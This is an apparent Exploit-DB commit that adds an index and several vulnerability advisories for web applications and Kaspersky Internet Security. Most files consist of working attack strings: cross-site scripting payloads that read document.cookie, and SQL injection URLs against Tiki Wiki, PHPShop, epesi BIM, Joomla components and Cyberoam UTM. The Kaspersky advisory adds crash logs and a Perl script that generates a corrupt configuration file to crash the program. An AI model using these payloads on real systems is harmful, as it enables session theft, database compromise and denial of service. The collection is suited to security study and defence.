DB: 2015-03-24

10 new exploits

files.csv

@@ -32863,6 +32863,7 @@ id,file,description,date,author,platform,type,port
 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
 36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0
+36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service and Unspecified Vulnerabilitiies",2011-12-12,anonymous,windows,dos,0
 36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-13,Am!r,php,webapps,0
 36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting Vulnerability",2011-12-31,Am!r,php,webapps,0
 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
@@ -32882,3 +32883,12 @@ id,file,description,date,author,platform,type,port
 36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
 36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0
+36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting Vulnerability",2011-12-19,G13,php,webapps,0
+36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0
+36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection Vulnerability",2011-12-20,"Stefan Schurtz",php,webapps,0
+36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-12-20,"High-Tech Bridge SA",php,webapps,0
+36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0
+36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 'tableid' Parameter SQL Injection Vulnerability",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
+36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
+36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-21,Vulnerability-Lab,hardware,remote,0
+36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0

platforms/hardware/remote/36475.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/51156/info
+
+Barracuda Control Center 620 is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 
+
+https://www.example.com/bcc/editdevices.jsp?device-type=spyware&selected-node=1&containerid=[IVE]
+https://www.example.com/bcc/main.jsp?device-type=[IVE] 

platforms/php/webapps/36468.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51119/info
+
+PHP Booking Calendar is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHP Booking Calendar 10e is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS] 

platforms/php/webapps/36469.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51125/info
+
+Joomla! 'com_tsonymf' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[PATH]/index.php?option=com_tsonymf&controller=fpage&task=flypage&idofitem=162 (SQL) 

platforms/php/webapps/36470.txt

@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/51128/info
+
+Tiki Wiki CMS Groupware is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 
+
+Tested with Firefox 7.01
+
+Visit this URL
+
+http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site
+
+But when you visit one of this pages, the XSS will be executed
+
+http://www.example.com/tiki-8.1/tiki-login.php
+http://www.example.com/tiki-8.1/tiki-remind_password.php
+
+// browser source code
+
+show_errors: &#039;y&#039;,
+		xss: &#039;</style></script><script>alert(document.cookie)</script>&#039;
+};
+
+Another example:
+
+http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
+http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
+http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>
+
+All of them will be executed!
+
+// browser source code
+
+show_errors: &#039;y&#039;,
+	xss1: &#039;</style></script><script>alert(document.cookie)</script>&#039;,
+	xss2: &#039;</style></script><script>alert(document.cookie)</script>&#039;,
+	xss3: &#039;</style></script><script>alert(document.cookie)</script>&#039;
+};
+
+

platforms/php/webapps/36471.txt

@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/51130/info
+
+PHPShop CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPShop CMS 3.4 is vulnerable; prior versions may also be affected. 
+
+SQL:
+
+http://www.example.com/phpshop/admpanel/photo/admin_photo_content.php?pid=6%20AND%201=2
+
+http://www.example.com/phpshop/admpanel/page/adm_pages_new.php?catalogID=3%20AND%201=2
+
+http://www.example.com/phpshop/admpanel/catalog/admin_cat_content.php?pid=3%20AND%201=2
+
+http://www.example.com/phpshop/admpanel/catalog/adm_catalog_new.php?id=3%20AND%201=1
+
+XSS:
+
+http://www.example.com/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
+
+http://www.example.com/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+
+http://www.example.com/phpshop/admpanel/links/adm_links_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+
+http://www.example.com/phpshop/admpanel/menu/adm_menu_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3 C/script%3E
+
+http://www.example.com/gbook/?a=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/phpshop/admpanel/catalog/admin_cat_content.php?pid=%22%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E
+
+http://www.example.com/phpshop/admpanel/catalog/adm_catalog_new.php?id=%%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
+
+http://www.example.com/phpshop/admpanel/page/adm_pages_new.php?catalogID=%22%3E%3Cscript%3Ealert%28document.c ookie%29;%3C/script%3E
+
+http://www.example.com/phpshop/admpanel/photo/admin_photo_content.php?pid=%22%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E
+

platforms/php/webapps/36472.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51141/info
+
+Joomla! 'com_caproductprices' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[PATH]/index.php?option=com_caproductprices&Itemid=&task=graph&id=83 (SQL) 

platforms/php/webapps/36473.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51143/info
+
+Cyberoam UTM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/corporate/Controller?mode=301&tableid=[SQL]&sort=&dir= 

platforms/php/webapps/36474.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/51149/info
+
+epesi BIM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+epesi BIM 1.2.0 rev 8154 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/admin/phpfm.php?frame=3&dir_atual=%3Cscript%3Ealert%28123%29;%3C/script%3E
+
+http://www.example.com/admin/themeup.php/%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
+
+http://www.example.com/admin/wfb.php?msg=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+

platforms/windows/dos/36443.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51027/info
+
+The Opera Web browser is prone to multiple remote denial-of-service vulnerabilities and an unspecified vulnerability.
+
+An attacker can exploit these issues to cause the affected application to crash, denying service to legitimate users.
+
+Note: The impact of the unspecified vulnerability is not known. We will update this BID when more information emerges.
+
+Versions prior to Opera Web Browser 11.60 are vulnerable. 
+
+http://www.exploit-db.com/sploits/36443.zip

platforms/windows/local/36476.txt

@@ -0,0 +1,426 @@
+source: http://www.securityfocus.com/bid/51161/info
+
+Kaspersky Internet Security and Anti-Virus are prone to a local memory-corruption vulnerability.
+
+A local attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; this has not been confirmed. 
+
+Title:
+======
+Kaspersky IS&AV 2011/12 - Memory Corruption Vulnerability
+
+
+Date:
+=====
+2011-12-19
+
+
+References:
+===========
+http://www.vulnerability-lab.com/get_content.php?id=129
+
+
+VL-ID:
+=====
+129
+
+
+Introduction:
+=============
+Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you re surfing the web. 
+It provides constant protection for you and your family – whether you work, bank, shop or play online.
+
+Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from 
+a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning 
+technologies work silently in the background while you enjoy your digital life.
+
+(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus  &&  http://www.kaspersky.com/kaspersky_internet_security)
+
+
+Abstract:
+=========
+Vulnerability-Lab Team discovered a Memory & Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 & Kaspersky Anti-Virus 2011/2012.
+
+
+Report-Timeline:
+================
+2010-12-04:	Vendor Notification
+2011-01-16:	Vendor Response/Feedback
+2011-12-19:	Public or Non-Public Disclosure
+
+
+Status:
+========
+Published
+
+
+Affected Products:
+==================
+
+Exploitation-Technique:
+=======================
+Local
+
+
+Severity:
+=========
+Medium
+
+
+Details:
+========
+A Memory Corruption vulnerability is detected on Kaspersky Internet Security 2011/2012 &  Kaspersky Anti-Virus 2011/2012. 
+The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the kaspersky exception filters, 
+which could be exploited by attackers to crash he complete software process. 
+The bug is located over the basegui.ppl & basegui.dll when processing a .cfg file import.
+
+
+Vulnerable Modules: 
+
+			[+] CFG IMPORT
+
+
+Affected Version(s):
+Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012
+KIS 2012 v12.0.0.374
+KAV 2012 v12.x
+
+Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011
+KIS 2011 v11.0.0.232 (a.b)
+KAV 11.0.0.400
+KIS 2011 v12.0.0.374
+
+Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010
+
+
+--- Kaspersky Bug Logs ---
+
+Folder:                  ../Analyses/Crash Reports (KIS&KAV)
+
+KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp
+KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp
+KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp
+
+KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp
+KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp
+KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp
+
+KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp
+KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp
+KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp
+
+KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp
+KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp
+KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp
+
+Reference(s): 
+				../Analyses/Crash Reports (KIS&KAV)/kav_x32.rar
+				../Analyses/Crash Reports (KIS&KAV)/kis_x32-win7.zip
+				../Analyses/Crash Reports (KIS&KAV)/kis_x64.zip
+
+		
+
+--- Service Crash Report Queue Logs ---
+
+Folder: ../Analyses/Crash Reports (Service)
+
+AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7
+AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95
+AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e
+AppCrash_avp.exe_5f09d49c257b515e08a6defbf11
+AppCrash_avp.exe_69cb355e72347419436f047a313
+AppCrash_avp.exe_69cb355e72347419436f047a313
+AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977
+AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad
+AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327
+AppCrash_avp.exe_ed94bb914e255192b71d1257c19
+
+
+Version=1
+EventType=APPCRASH
+EventTime=129256270253026260
+ReportType=2
+Consent=1
+UploadTime=129256270260076663
+ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6
+IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6
+WOW64=1
+Response.BucketId=1985200055
+Response.BucketTable=1
+Response.type=4
+Sig[0].Name=Anwendungsname
+Sig[0].Value=avp.exe
+Sig[1].Name=Anwendungsversion
+Sig[1].Value=11.0.1.400
+Sig[2].Name=Anwendungszeitstempel
+Sig[2].Value=4c2cd011
+Sig[3].Name=Fehlermodulname
+Sig[3].Value=basegui.ppl
+Sig[4].Name=Fehlermodulversion
+Sig[4].Value=11.0.1.400
+Sig[5].Name=Fehlermodulzeitstempel
+Sig[5].Value=4c2cd193
+Sig[6].Name=Ausnahmecode
+Sig[6].Value=c0000005
+Sig[7].Name=Ausnahmeoffset
+Sig[7].Value=00079c3c
+DynamicSig[1].Name=Betriebsystemversion
+DynamicSig[1].Value=6.1.7600.2.0.0.768.3
+DynamicSig[2].Name=Gebietsschema-ID
+DynamicSig[2].Value=1031
+DynamicSig[22].Name=Zusatzinformation 1
+DynamicSig[22].Value=0a9e
+DynamicSig[23].Name=Zusatzinformation 2
+DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
+DynamicSig[24].Name=Zusatzinformation 3
+DynamicSig[24].Value=0a9e
+DynamicSig[25].Name=Zusatzinformation 4
+DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
+UI[2]=C://Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe
+UI[3]=Kaspersky Anti-Virus funktioniert nicht mehr
+UI[4]=Windows kann online nach einer Lösung für das Problem suchen und versuchen, das Programm neu zu starten.
+UI[5]=Online nach einer Lösung suchen und das Programm neu starten
+UI[6]=Später online nach einer Lösung suchen und das Programm schließen
+UI[7]=Programm schließen
+LoadedModule[0]=C:/Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe
+LoadedModule[1]=C://Windows/SysWOW64/ntdll.dll
+LoadedModule[2]=C://Windows/syswow64/kernel32.dll
+LoadedModule[3]=C:/Windows/syswow64/KERNELBASE.dll
+...
+...
+LoadedModule[148]=C://Windows//SysWOW64//WMVCore.DLL
+LoadedModule[149]=C://Windows////SysWOW64//WMASF.DLL
+LoadedModule[150]=C://Windows//////SysWOW64////EhStorAPI.dll
+LoadedModule[151]=C://Program Files (x86)//Internet Explorer//ieproxy.dll
+LoadedModule[152]=C://Windows//SysWOW64//SAMLIB.dll
+State[0].Key=Transport.DoneStage1
+State[0].Value=1
+State[1].Key=DataRequest
+State[1].Value=Bucket=1985200055/nBucketTable=1/nResponse=1/n
+FriendlyEventName=Nicht mehr funktionsfähig
+ConsentKey=APPCRASH
+AppName=Kaspersky Anti-Virus
+AppPath=C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//avp.exe
+
+
+
+
+--- System Crash Report Queue Logs ---
+
+Folder:		Analyses//Crash Reports (System)
+
+WER7A62.tmp.appcompat.txt
+WER7FFE.tmp.mdmp
+WER6127.tmp.WERInternalMetadata.xml
+
+
+
+--- Exception Log ---
+(a50.ee8): Access violation - code c0000005 (first/second chance not available)
+eax=00000000 ebx=0331e7bc ecx=9699eef0 edx=6ddf9ba0 esi=00000002 edi=00000000
+eip=76f900ed esp=0331e76c ebp=0331e808 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+
+
+
+
+--- Debug Logs ---
+FAULTING_IP: 
+basegui+79bed
+6ddf9bed 8b11            mov     edx,dword ptr [ecx]
+
+EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 9699eef0
+Attempt to read from address 9699eef0
+
+PROCESS_NAME:  avp.exe
+
+FAULTING_MODULE: 755b0000 kernel32
+DEBUG_FLR_IMAGE_TIMESTAMP:  4c4f15cf
+MODULE_NAME: basegui
+ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.
+EXCEPTION_PARAMETER1:  00000000
+EXCEPTION_PARAMETER2:  9699eef0
+
+READ_ADDRESS:  9699eef0 
+
+FOLLOWUP_IP: 
+basegui+79bed
+6ddf9bed 8b11            mov     edx,dword ptr [ecx]
+
+FAULTING_THREAD:  00000ee8
+BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ
+PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_WRITE
+DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
+LAST_CONTROL_TRANSFER:  from 6ddf9bfd to 6ddf9bed
+
+STACK_TEXT:  
+0331f9b8 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bed
+0331f9f0 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bfd
+0331fa28 6de5bd10 0331fa54 02485068 00000001 basegui+0x79bfd
+0331fa48 6de33ad0 0331fa54 000001f6 000001c2 basegui!DllUnregisterServer+0x12580
+0331fa5c 6de34320 00000200 00000000 01c201f6 basegui+0xb3ad0
+0331fa9c 6de34d45 000504b4 00000200 00000000 basegui+0xb4320
+0331fae0 6de33fdd 000504b4 00000200 00000000 basegui+0xb4d45
+0331fb30 754c6238 00000000 00000200 00000000 basegui+0xb3fdd
+0331fb5c 754f12a1 02bb0fb0 000504b4 00000200 user32!gapfnScSendMessage+0x270
+0331fbd8 754f10e2 0059afd4 02bb0fb0 000504b4 user32!SendNotifyMessageW+0x341
+0331fc28 754f11e7 00a06c90 00000000 00000200 user32!SendNotifyMessageW+0x182
+0331fc48 754c6238 000504b4 00000200 00000000 user32!SendNotifyMessageW+0x287
+0331fc74 754c68ea 754f11be 000504b4 00000200 user32!gapfnScSendMessage+0x270
+0331fcec 754c7d31 0059afd4 76db3908 000504b4 user32!gapfnScSendMessage+0x922
+0331fd4c 754c7dfa 76db3908 00000000 0331fd88 user32!LoadStringW+0x11f
+0331fd5c 754e2292 0331fe18 00000000 0331fe18 user32!DispatchMessageW+0xf
+0331fd88 754e70a9 000504b4 00000000 02485048 user32!IsDialogMessageW+0x11e
+0331fdb0 6de2e50b 000504b4 0331fe18 023d9be8 user32!IsDialogMessage+0x58
+0331fdcc 6de20c1c 0331fe18 74113b90 00000000 basegui+0xae50b
+0331fdfc 6de231a8 0331fe18 7411383c 02e260ec basegui+0xa0c1c
+0331fe50 6de07dbc 00000000 005e8228 6ddd6f8c basegui+0xa31a8
+0331fe64 72da3487 00000003 00000000 005e8244 basegui+0x87dbc
+
+
+STACK_COMMAND:  ~5s; .ecxr ; kb
+SYMBOL_STACK_INDEX:  0
+SYMBOL_NAME:  basegui+79bed
+FOLLOWUP_NAME:  MachineOwner
+IMAGE_NAME:  basegui.ppl
+BUCKET_ID:  WRONG_SYMBOLS
+FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_basegui.ppl!Unknown
+WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/avp_exe/11_0_0_232/4be3cfb6/basegui_ppl/11_0_0_241/4c4f15cf/c0000005/00079bed.htm?Retriage=1
+
+Followup: MachineOwner
+---------
+0:005> lmvm basegui
+start    end        module name
+6dd80000 6df19000   basegui    (export symbols)       basegui.ppl
+    Loaded symbol image file: basegui.ppl
+    Image path: C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//basegui.ppl
+    Image name: basegui.ppl
+    Timestamp:        Tue Jul 27 19:22:23 2010 (4C4F15CF)
+    CheckSum:         0019E22D
+    ImageSize:        00199000
+    File version:     11.0.0.241
+    Product version:  11.0.0.241
+    File flags:       0 (Mask 3F)
+    File OS:          40004 NT Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0409.04b0
+    CompanyName:      Kaspersky Lab ZAO
+    ProductName:      Kaspersky Anti-Virus
+    InternalName:     BASEGUI
+    OriginalFilename: BASEGUI.DLL
+    ProductVersion:   11.0.0.241
+    FileVersion:      11.0.0.241
+    FileDescription:  Kaspersky Anti-Virus GUI Windows part
+    LegalCopyright:   Copyright © Kaspersky Lab ZAO 1997-2010.
+    LegalTrademarks:  Kaspersky™ Anti-Virus ®  is registered trademark of Kaspersky Lab ZAO.
+0:005> .exr 0xffffffffffffffff
+ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 9699eef0
+Attempt to read from address 9699eef0
+
+
+Information:
+The kaspersky .cfg file import exception-handling filters wrong or manipulated file imports like one this first test ... (wrong-way.png).
+The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows
+an local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8.
+
+Notice:
+An local attacker do not need to know any passwords to load a .cfg (Configuration) file. (access-rights.png)
+
+
+Folder:			
+                                                ../Analyses/Debug
+
+
+References(Pictures):
+						../appcrash1.png
+						../appcrash2.png
+						../appcrash3.png
+						../appcrash4.png
+						../appcrash5.png
+						../debug&exception.png
+						../kav2011.png
+						../reproduce-x32.png
+						../wrong-way.png
+						../access-rights.png
+
+
+Proof of Concept:
+=================
+The vulnerability can be exploited by local attackers via import or remote attacker via user inter action. 
+For demonstration or reproduce ...
+
+
+#!/usr/bin/perl
+##############################################################################
+my $code="corrupt" x 1;
+###################################################################
+$FH1 = "file1";
+$FilePath1 = "part1.bin";
+$FH2 = "file2";
+$FilePath2 = "part2.bin";
+###################################################################
+open(myfile,'>> poc_pwn.cfg');
+binmode myfile;
+###################################################################
+open(FH1, $FilePath1);
+binmode FH1;
+while (<FH1>) {
+         print myfile;
+      }
+ close(FH1);
+print myfile $code;
+open(FH2, $FilePath2);
+binmode FH2;
+while (<FH2>) {
+         print myfile;
+      }
+close(FH2);
+###################################################################
+
+
+PoC:			
+			../PoC/kis&kav_2011_2012_p0c.pl
+			../PoC/part1.bin
+			../PoC/part2.bin
+
+
+Risk:
+=====
+The security risk of the bug/vulnerability is estimated as medium(+).
+
+
+Credits:
+========
+Vulnerability Research Laboratory - Benjamin K.M. (Rem0ve)
+
+
+Disclaimer:
+===========
+The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
+Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
+other media, are reserved by Vulnerability-Lab or its suppliers.
+
+    						Copyright © 2011|Vulnerability-Lab
+
+
+
+
+
+